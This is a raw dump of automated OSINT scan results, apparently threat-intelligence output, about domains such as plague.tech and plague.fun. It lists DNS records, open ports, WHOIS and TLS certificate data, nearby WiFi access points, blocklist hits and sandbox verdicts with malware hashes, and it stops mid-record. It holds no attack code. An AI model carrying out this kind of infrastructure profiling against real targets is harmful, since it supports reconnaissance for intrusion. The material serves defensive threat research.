TCP Port No SSL Certificate Analyzer 0 0 2 0 None 188.114.96.9:443 188.114.96.9 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.137.37 2022-12-18 00:18:25 IP Address No DNS Resolver 0 0 2 0 None 81.88.52.232 ftp.zerotwo-best-waifu.online 2022-12-18 00:03:05 Domain Name No DNS Resolver 0 0 1 0 None zerotwo-best-waifu.online zerotwo-best-waifu.online 2022-12-18 00:20:59 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b2699f7f992d88-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 2606:4700:3033::6815:1cf0 2022-12-18 00:12:39 Physical Location No ipapi.co 1 0 2 0 None Bergamo, Lombardy, 25, Italy, IT 81.88.52.232 2022-12-18 00:21:06 Open TCP Port No Censys 0 0 2 0 None 172.67.147.230:2096 172.67.147.230 2022-12-18 00:09:55 Hosting Provider No Hosting Provider Identifier 0 0 2 0 None Cloudflare Inc: https://www.cloudflare.com/ 172.67.169.215 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None S-lan (Net ID: 00:01:24:F1:91:41) 37.780462,-122.390564 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:01:E6:93:CF:EC) 37.7803446,-122.3906132 2022-12-18 00:09:39 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.9:80 188.114.97.9 2022-12-18 00:32:18 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@west.cn Domain Name: PLAGUE.TECH Registry Domain ID: D183124424-CNIC Registrar WHOIS Server: whois.west.cn Registrar URL: http://www.west.cn Updated Date: 2022-06-14T09:03:38.0Z Creation Date: 2020-04-17T02:15:35.0Z Registry Expiry Date: 2023-04-17T23:59:59.0Z Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD. Registrar IANA ID: 1556 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Wei Cao Registrant State/Province: Jiang Su Registrant Country: CN Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS4.MYHOSTADMIN.NET Name Server: NS5.MYHOSTADMIN.NET DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: abuse@west.cn Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:32:15.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: plague.tech Registry Domain ID: zd33450047986564 Registrar WHOIS Server: whois.west.cn Registrar URL: www.west.cn Updated Date: 2020-04-17T02:15:35.0Z Creation Date: 2020-04-17T02:15:35.0Z Registrar Registration Expiration Date: 2023-04-17T23:59:59.0Z Registrar: Chengdu west dimension digital technology Co., LTD Registrar IANA ID: 1556 Reseller: Domain Status: ok http://www.icann.org/epp#ok Registry Registrant ID: Not Available From Registry Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Jiang Su Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CN Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: Registrant Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Registry Admin ID: Not Available From Registry Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: Admin Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Registry Tech ID: Not Available From Registry Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: Tech Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Name Server: ns4.myhostadmin.net Name Server: ns5.myhostadmin.net DNSSEC: signedDelegation Registrar Abuse Contact Email: westabuse@gmail.com Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:32:15.0Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en 2022-12-18 00:21:30 Netblock Membership No Censys 0 0 2 0 None 172.67.176.0/20 172.67.190.129 2022-12-18 00:04:11 SSL Certificate - Issued to No SSL Certificate Analyzer 1 0 2 0 None C=US,ST=California,L=San Francisco,O=Cloudflare\, Inc.,CN=sni.cloudflaressl.com 188.114.97.0 2022-12-18 00:11:48 Malicious Affiliate IP Address Yes Greensnow 0 1 3 0 None greensnow.co [81.88.52.223] https://blocklist.greensnow.co/greensnow.txt 81.88.52.223 2022-12-18 00:05:30 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 50, u'search_terms': [{u'id': u'host', u'value': u'34.149.204.188'}], u'result': [{u'environment_id': 160, u'job_id': u'639b86f88e5d6a5019170247', u'analysis_start_time': u'2022-12-15 20:43:36', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'712d1d20f064114cc64700107d97bc4ca72b5b0e7253ca2480f5f0106c79287b', u'type': None, u'type_short': u'url', u'size': 57}, {u'environment_id': 120, u'job_id': u'6398ae79755aa64ea929430c', u'analysis_start_time': u'2022-12-13 16:55:21', u'vx_family': u'Phishing site', u'av_detect': u'8', u'environment_description': u'Windows 7 64 bit', u'threat_score': 78, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'e0e605373f75d55769ad41406555776e4e6fbd0450c2612769a7bc62233760e9', u'type': None, u'type_short': u'url', u'size': 103}, {u'environment_id': 160, u'job_id': u'63988d48c3cb1479001a891e', u'analysis_start_time': u'2022-12-13 14:33:45', u'vx_family': u'Phishing site', u'av_detect': u'2', u'environment_description': u'Windows 10 64 bit', u'threat_score': 37, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'ddcb66cdb51ee5cf66b7beb2b7046ce4f90a24e72f28de00218cc1ca7c90d749', u'type': None, u'type_short': u'url', u'size': 86}, {u'environment_id': 100, u'job_id': u'639878df4bad0d348b79f6ae', u'analysis_start_time': u'2022-12-13 13:06:40', u'vx_family': u'Phishing site', u'av_detect': u'1', u'environment_description': u'Windows 7 32 bit', u'threat_score': 15, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'6c5009840f5256b8137abb71c172d7c6b8ffd3901df4cba638a5a4ea90af132d', u'type': None, u'type_short': u'url', u'size': 73}, {u'environment_id': 120, u'job_id': u'63977160e0209061d24439e2', u'analysis_start_time': u'2022-12-12 18:22:25', u'vx_family': None, u'av_detect': u'100', u'environment_description': u'Windows 7 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'63084c4f7694ff0363e87eb78b9e77ef834e7180f085933041ffdcff428cc67b', u'type': None, u'type_short': u'url', u'size': 63}, {u'environment_id': 100, u'job_id': u'63972a8bbad3886b1a4beefb', u'analysis_start_time': u'2022-12-12 13:20:12', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'66d7aeb45cd7325473fa2888c0a6fc99bff4647cc4446480a6f660c338b3713f', u'type': None, u'type_short': u'url', u'size': 73}, {u'environment_id': 120, u'job_id': u'6396afc57936a656c93b1410', u'analysis_start_time': u'2022-12-12 04:36:22', u'vx_family': u'Phishing site', u'av_detect': u'4', u'environment_description': u'Windows 7 64 bit', u'threat_score': 36, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'755f2ff4aa62c8a74a839c5f5f42a8e76600a08bc09a10f68adff5cbdbc401cd', u'type': None, u'type_short': u'url', u'size': 111}, {u'environment_id': 120, u'job_id': u'6396afc3f29bea42ac015f44', u'analysis_start_time': u'2022-12-12 04:48:46', u'vx_family': u'Phishing site', u'av_detect': u'4', u'environment_description': u'Windows 7 64 bit', u'threat_score': 21, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'b803880847e6c409dd15f4230dd09079395f33f07ddb8e4e7b8427a6f167a81a', u'type': None, u'type_short': u'url', u'size': 99}, {u'environment_id': 120, u'job_id': u'6396afc154d15a50a75ae67f', u'analysis_start_time': u'2022-12-12 04:40:04', u'vx_family': u'Phishing site', u'av_detect': u'4', u'environment_description': u'Windows 7 64 bit', u'threat_score': 21, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'5a35908f97811096692884417eda47b6428c5f1a58536a03f6001b6ad66c93b4', u'type': None, u'type_short': u'url', u'size': 101}, {u'environment_id': 100, u'job_id': u'6394867ee3fda905dd1f3fd7', u'analysis_start_time': u'2022-12-10 13:15:43', u'vx_family': u'Malware', u'av_detect': u'1', u'environment_description': u'Windows 7 32 bit', u'threat_score': 80, u'verdict': u'malicious', u'submit_name': u'Sims2RPCSettings.exe', u'sha256': u'5822e87fe484f98cd455b13b7db364f91838e8dd0c87a83bd991f490e5483d51', u'type': None, u'type_short': u'.NET exe', u'size': 2870784}, {u'environment_id': 160, u'job_id': u'638db872e1d84b2dd473d9a6', u'analysis_start_time': u'2022-12-05 09:22:59', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'ccb4b08d86a8b7e872a8f20d9687306e4ec5f0e0c2229710e0c0312ae34bd11b', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 100, u'job_id': u'638d12912d319530ad74ec32', u'analysis_start_time': u'2022-12-04 21:35:14', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'ccb4b08d86a8b7e872a8f20d9687306e4ec5f0e0c2229710e0c0312ae34bd11b', u'type': None, u'type_short': u'url', u'size': 53}, {u'environment_id': 160, u'job_id': u'6381f1ceea264744470dfcc9', u'analysis_start_time': u'2022-11-26 11:00:37', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'ElevenClock.Installer.exe', u'sha256': u'ed6eec08829398952471d300cb812cffcc81aa34cf547d67e0d42191b8d0691a', u'type': None, u'type_short': u'exe', u'size': 26515554}, {u'environment_id': 160, u'job_id': u'637ce956ceda373df42c5d83', u'analysis_start_time': u'2022-11-22 15:23:03', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'dc59c12f2c51c90380d5086abe7b14189976580f353bc2e32433690dfe426b7e', u'type': None, u'type_short': u'url', u'size': 48}, {u'environment_id': 110, u'job_id': u'637c3a7f921f9b758e3e9f8b', u'analysis_start_time': u'2022-11-22 02:57:04', u'vx_family': u'Phishing site', u'av_detect': u'5', u'environment_description': u'Windows 7 32 bit (HWP Support)', u'threat_score': 21, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'2dcf8fa5bea6416cc1c8a8b66ba24e833480b0ebc7451340d4d484e49fd3bb59', u'type': None, u'type_short': u'url', u'size': 71}, {u'environment_id': 160, u'job_id': u'637b4d4df31a916ba12d7d06', u'analysis_start_time': u'2022-11-21 10:05:02', u'vx_family': u'Lazy.Generic', u'av_detect': u'46', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'Loader.exe', u'sha256': u'75472659cdd37b82e323973d273e75de192f72beb5f3f83d9235eb767c70794c', u'type': None, u'type_short': u'.NET exe', u'size': 33792}, {u'environment_id': 100, u'job_id': u'6376f77a7dd250226e34d21b', u'analysis_start_time': u'2022-11-18 03:09:46', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'1a8504381e6e071e92540e8d7b63b9f627b793b3ae398a9f28e9ee593abbc825', u'type': None, u'type_short': u'url', u'size': 51}, {u'environment_id': 100, u'job_id': u'6376e43eb290032b7246a9b4', u'analysis_start_time': u'2022-11-18 01:47:42', u'vx_family': u'Phishing site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 2, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'84a9b0dc38c6b99cb034101ea52a1f71e691e5687fa133ba4146832b796a7fd8', u'type': None, u'type_short': u'url', u'size': 75}, {u'environment_id': 160, u'job_id': u'63739048a7cc601b0176f795', u'analysis_start_time': u'2022-11-15 13:12:41', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'39f67ede6b34705ef115c2fee0b152744b534e6a6e274fbcb0612413704878e5', u'type': None, u'type_short': u'url', u'size': 62}, {u'environment_id': 160, u'job_id': u'637267efde3d07498a399886', u'analysis_start_time': u'2022-11-14 16:08:15', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'9a3171fbc8967464d9e5a470251021689b502f906c630a3da5f47880499bba91', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 160, u'job_id': u'6372380445646732e03c5b91', u'analysis_start_time': u'2022-11-14 12:43:48', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 29, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'43c0bcfb2e4ae83a20e2dc2b9fdb0d76f1161ca2a7a18985fbd63740e408371b', u'type': None, u'type_short': u'url', u'size': 49}, {u'environment_id': 160, u'job_id': u'63704e2b711763749b52451e', u'analysis_start_time': u'2022-11-13 01:53:47', u'vx_family': u'Malware site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 12, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'2f4b58226525a3a71c4c1177126c8c1efb737963cb9ac34bc59f0e77b454f578', u'type': None, u'type_short': u'url', u'size': 50}, {u'environment_id': 100, u'job_id': u'636ced7ad9090451e85ca2ea', u'analysis_start_time': u'2022-11-10 12:24:28', u'vx_family': None, u'av_detect': u'50', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'66b9d9000965b286f3d4f053c69b8dbfb1da27fe0386e2af8dddfabaf4aafd77', u'type': None, u'type_short': u'url', u'size': 68}, {u'environment_id': 160, u'job_id': u'636a9aa9b780b50bd465abeb', u'analysis_start_time': u'2022-11-08 18:06:41', u'vx_family': u'Python/Packed.Nuitka', u'av_detect': u'40', u'environment_description': u'Windows 10 64 bit', u'threat_score': 100, u'verdict': u'malicious', u'submit_name': u'533e42cb330c3b03136edefe566e4925d232e2e3c4cef1c641ed599a69e9c005 34.149.204.188 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None usernamervali.bancoesername.repl.co 34.149.204.188 2022-12-18 00:04:28 Affiliate - Internet Name - Unresolved No DNS Raw Records 0 0 1 0 None spf.efwd.registrar-servers.com misogyny.wtf 2022-12-18 00:03:36 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None stream.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:05:62:a3:2a:56:6a:d6:e7:de:85:5f:24:ee:fd:d0:9c:8a Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=R3 Validity Not Before: Jun 25 00:45:18 2022 GMT Not After : Sep 23 00:45:17 2022 GMT Subject: CN=stream.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:d4:d3:1e:2e:64:b9:23:19:ce:c1:76:2c:4d:10: be:a7:68:fc:7c:b6:7d:e6:82:bb:d7:ee:d1:4e:63: 0b:9e:ad:c3:63:af:d4:36:22:f0:7e:31:d0:96:4a: 0a:a6:d8:32:94:5e:f5:33:45:27:83:a8:84:f3:0c: d4:38:c0:90:ca:bb:67:fb:2f:bd:2c:02:19:2f:cc: 71:0a:be:75:68:08:3b:cd:38:60:b7:ee:8b:2e:a6: b5:82:dc:b3:e3:b2:a1:e8:dc:2a:57:c6:d5:41:99: 54:ba:0e:fa:92:84:f1:45:24:58:76:79:96:64:e6: c1:50:ae:31:3e:8b:dc:65:d5:c3:bf:5b:9e:47:2c: 82:81:92:5a:38:b7:b6:d3:a2:1b:1b:a2:0e:5e:55: 73:53:58:16:be:dc:7a:c0:9c:f9:70:a3:73:f7:69: 86:b5:ef:c3:9b:6e:f8:5c:b6:59:d7:fe:b0:84:ff: 23:bd:bf:47:d4:49:9f:7c:54:1e:7b:db:5f:fe:cf: d9:0c:22:87:c7:bd:de:3f:e9:77:94:ba:a9:fe:ce: 0c:e9:e2:21:68:88:3e:6c:c6:bb:cd:0a:1f:47:b6: ac:fe:7d:77:7d:16:d2:30:74:f7:6f:b0:27:19:81: 49:95:ba:01:5a:c9:2e:0d:be:94:72:a4:56:59:8c: ce:b5 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 5D:E4:A6:AA:5A:2B:6A:0A:62:3D:88:7F:B5:09:6F:59:0E:78:37:3B X509v3 Authority Key Identifier: keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6 Authority Information Access: OCSP - URI:http://r3.o.lencr.org CA Issuers - URI:http://r3.i.lencr.org/ X509v3 Subject Alternative Name: DNS:stream.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 3b:16:9e:bd:67:76:ce:57:13:49:eb:a5:4f:2c:d0:07:2c:e8: d0:23:fa:1d:99:77:4f:d3:c7:14:77:0b:b0:ff:9c:90:3d:7b: 03:66:77:f4:20:bc:bc:9a:d2:6b:37:7a:5a:fa:56:bd:e7:45: eb:db:bb:c3:bc:f2:ef:b7:1b:8c:5d:18:8c:fe:6b:84:12:bb: 14:ec:13:60:6a:ff:3e:d8:bc:7b:ce:22:d3:d3:49:3c:3b:62: d7:cc:06:4d:38:a9:d2:47:f9:38:d4:52:7f:8d:b2:4a:2b:80: cf:92:d8:7c:a8:25:96:f6:78:17:1e:e1:eb:38:96:dd:52:cf: c9:37:e8:f6:2b:da:c7:e8:b7:63:c9:0e:ad:56:8c:aa:2d:54: 45:dc:d3:86:b7:85:7a:ec:43:eb:74:14:30:5f:5d:84:85:b4: 6b:d9:54:43:69:a8:bd:88:93:36:cf:43:49:23:7f:54:0a:72: d7:02:de:2d:12:0b:6a:39:42:07:99:ad:ea:f6:29:be:79:d5: 3c:d3:16:62:66:67:78:43:f1:51:00:1c:19:fb:cb:09:b2:d7: 65:2a:db:66:0a:e9:ab:e2:5d:d3:fa:fc:63:c8:b6:cb:8c:f9: 5d:66:ae:20:e0:29:51:ee:67:3c:31:57:9c:3b:5d:55:d2:7f: e2:2d:7a:a0 2022-12-18 00:05:58 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None www.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:e2:2d:48:dd:4c:ac:71:43:1c:ff:e5:61:16:60:4c:1f:a4 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 Validity Not Before: Oct 26 15:30:18 2020 GMT Not After : Jan 24 15:30:18 2021 GMT Subject: CN=www.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:eb:43:89:5d:2a:2b:fb:94:8a:04:2c:02:af:2a: 96:5b:3f:07:89:51:76:35:bf:db:b4:27:c7:db:3b: 22:5b:13:e2:bb:1a:ef:bd:f3:63:62:e1:9a:41:57: c7:e1:64:a6:3c:fb:73:f3:7e:8b:92:8b:36:7d:f5: 90:ef:19:3e:2a:70:e3:b1:1d:a8:a5:10:14:d9:44: 1e:e2:d1:86:fe:ed:a0:95:8f:1e:1f:b8:a0:64:8a: 03:2e:24:de:da:18:02:31:72:4c:bc:08:b8:b9:7d: 37:68:59:71:ff:34:47:3a:f5:31:0a:7b:e3:d7:a4: 57:9a:28:af:cb:cb:02:23:42:43:84:37:4b:43:a3: 7c:16:14:5c:c2:31:5d:41:8d:54:c0:19:2e:fc:1a: 1e:00:56:d0:6f:f0:7b:c7:06:ee:1d:32:f2:21:a6: 9b:2e:bf:1e:72:64:69:22:a6:bd:c9:5c:55:eb:28: 7f:90:ac:ce:a3:a0:3c:70:26:56:e2:ce:7e:0a:78: 11:31:a1:34:1f:1e:da:ce:6d:10:0d:02:88:dc:c0: 6a:29:a9:37:1f:9f:89:b4:a9:22:a8:7c:2d:4a:8f: a5:88:bf:b8:15:de:16:82:69:48:6c:4a:f5:1e:ac: 25:5f:c9:ac:67:4a:56:29:88:80:5a:e0:c0:f1:e2: 75:07 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: D2:0D:67:35:38:EF:6A:3B:4A:2F:E7:A1:89:80:E8:46:87:08:00:70 X509v3 Authority Key Identifier: keyid:A8:4A:6A:63:04:7D:DD:BA:E6:D1:39:B7:A6:45:65:EF:F3:A8:EC:A1 Authority Information Access: OCSP - URI:http://ocsp.int-x3.letsencrypt.org CA Issuers - URI:http://cert.int-x3.letsencrypt.org/ X509v3 Subject Alternative Name: DNS:plague.fun, DNS:www.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 5C:DC:43:92:FE:E6:AB:45:44:B1:5E:9A:D4:56:E6:10: 37:FB:D5:FA:47:DC:A1:73:94:B2:5E:E6:F6:C7:0E:CA Timestamp : Oct 26 16:30:18.641 2020 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:DC:B4:89:A6:A0:5A:ED:1D:B3:AC:CD: 37:B3:A5:79:03:9A:43:47:AA:C4:6A:A8:48:B1:EF:C0: 78:B9:66:89:F8:02:21:00:B9:0C:81:17:71:73:95:B5: E7:1B:DB:ED:99:E8:D3:34:03:49:96:28:B5:3C:79:35: C1:94:17:A7:68:1C:86:8C Signed Certificate Timestamp: Version : v1 (0x0) Log ID : F6:5C:94:2F:D1:77:30:22:14:54:18:08:30:94:56:8E: E3:4D:13:19:33:BF:DF:0C:2F:20:0B:CC:4E:F1:64:E3 Timestamp : Oct 26 16:30:18.636 2020 GMT Extensions: none Signature : ecdsa-with-SHA256 30:45:02:21:00:BC:11:DA:30:F8:B8:98:A2:8C:8B:4A: 66:E7:72:D4:1A:B7:FE:23:52:9B:59:4E:5B:68:10:A3: 32:CF:C7:4C:64:02:20:7D:D2:42:BF:15:1A:72:F7:66: 5B:D2:BB:19:EC:65:6A:8D:8C:C5:58:E5:16:14:C9:AA: 31:43:2C:F4:27:B0:89 Signature Algorithm: sha256WithRSAEncryption 65:59:4e:b2:06:fd:8c:80:fc:73:c0:96:54:e5:4e:b4:1b:25: 3d:76:a2:a7:bf:93:6e:2f:88:a4:39:ba:88:69:b8:f7:72:57: f5:81:77:be:6a:1b:cb:ab:d2:cc:b4:26:2f:34:2d:60:2d:fa: 7f:45:1d:72:b4:4a:39:a9:9f:7c:44:6a:07:34:0c:fd:f5:d4: fa:57:f3:6e:29:4b:a4:23:6f:7f:f1:2b:1b:ad:af:a8:99:93: 2b:8a:0e:1a:84:37:e2:2f:d7:fa:42:8e:72:4b:1b:33:23:5a: a6:a0:3a:db:2d:73:62:ba:62:6e:41:99:3f:fd:e8:43:d1:8a: 26:38:34:21:d6:b3:af:50:0d:de:5d:be:c5:f5:64:a4:b7:89: 67:60:6d:a9:ee:37:6f:90:e8:fb:e5:8b:68:b9:de:e0:d3:e0: 91:78:e9:96:57:9e:90:3c:08:40:95:cd:1e:b1:15:90:b4:79: d9:1e:e6:d3:bd:aa:2a:bb:24:bd:05:6a:2f:ed:59:e8:f8:10: 1b:7b:d1:a2:d6:4b:33:2a:5b:de:da:37:47:49:94:89:3d:91: 2a:35:3c:ac:3d:59:f3:96:be:fd:6d:bb:7e:75:d6:1f:de:07: 57:d2:c6:25:df:12:cf:c8:e2:e8:ba:12:78:d6:5a:99:40:19: c1:6a:2d:2c 2022-12-18 00:21:27 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b25f649e501417-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 2606:4700:3037::6815:13f3 2022-12-18 01:00:21 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.87] https://www.virustotal.com/en/ip-address/188.114.96.87/information/ 188.114.96.0/24 2022-12-18 00:12:08 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None {u'count': 6, u'search_terms': [{u'id': u'host', u'value': u'188.114.96.3'}], u'result': [{u'environment_id': 160, u'job_id': u'63922aaf5314515a5b27e492', u'analysis_start_time': u'2022-12-08 18:19:27', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 10 64 bit', u'threat_score': 14, u'verdict': u'suspicious', u'submit_name': u'sample.url', u'sha256': u'5c3448839631ff707600d12453402fbbace2521dd1e872785d8ee8eee878ba5b', u'type': None, u'type_short': u'url', u'size': 45}, {u'environment_id': 100, u'job_id': u'63922a8f84c34b190d49e386', u'analysis_start_time': u'2022-12-08 18:18:55', u'vx_family': u'Malicious site', u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': 2, u'verdict': 